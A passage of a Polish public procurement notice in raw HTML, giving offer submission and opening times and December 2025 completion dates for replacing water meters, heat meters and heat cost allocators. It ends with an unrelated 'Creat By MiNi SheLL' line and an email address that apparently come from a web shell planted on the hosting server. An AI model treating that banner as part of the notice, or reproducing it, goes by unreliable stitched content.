class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Portal dostępowy Urzędu Zamówień Publicznych (e-zamówienia.gov.pl): https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-06 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zakresu podstawowego w części 1: Dostawa i wymiana wodomierzy - do 15. 12. 2025 r.<br/><br/>Termin realizacji zakresu podstawowego w części 2: Dostawa i wymiana ciepłomierzy - do 15. 12. 2025 r.<br/><br/>Termin realizacji zakresu podstawowego w części 3: Dostawa i montaż podzielników - do 15. 12. 2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com